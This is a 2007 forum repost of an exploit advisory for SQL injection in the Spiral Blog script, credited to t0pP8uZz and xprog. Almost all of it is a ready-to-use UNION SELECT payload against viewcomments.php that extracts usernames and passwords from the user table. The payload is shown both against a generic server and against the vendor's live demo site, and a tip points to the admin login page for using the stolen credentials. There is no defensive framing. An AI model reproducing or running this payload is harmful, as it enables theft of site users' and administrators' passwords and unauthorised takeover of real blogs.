Gonzalez Posted June 28, 2007 Report Posted June 28, 2007 --==+================================================================================+==-- --==+ Spiral Blog SQL Injection Vulnerbilitys +==-- --==+================================================================================+==-- AUTHOR: t0pP8uZz & xprog SCRIPT DOWNLOAD: N/A SITE: [url]http://www.spiralscripts.co.uk[/url] DORK: N/A DESCRIPTION: get users/admins password EXPLOITS: EXPLOIT 1: [url]http://www.server.com/SCRIPT_PATH/viewcomments.php?blogid=-1[/url] UNION ALL SELECT 1,2,3,concat(username,0x3a,password),5,6 from usertable-- EXAMPLES: EXAMPLE ON DEMO: [url]http://www.spiralscripts.co.uk/demoscripts/blog/viewcomments.php?blogid=-1[/url] UNION ALL SELECT 1,2,3,concat(username,0x3a,password),5,6 from usertable-- NOTE/TIP: admin login: [url]http://www.server.com/BLOG_PATH/admin[/url] GREETZ: milw0rm.com, H4CKY0u.org, ~removed~ ! --==+================================================================================+==-- --==+ Spiral Blog SQL Injection Vulnerbilitys +==-- --==+================================================================================+==-- Quote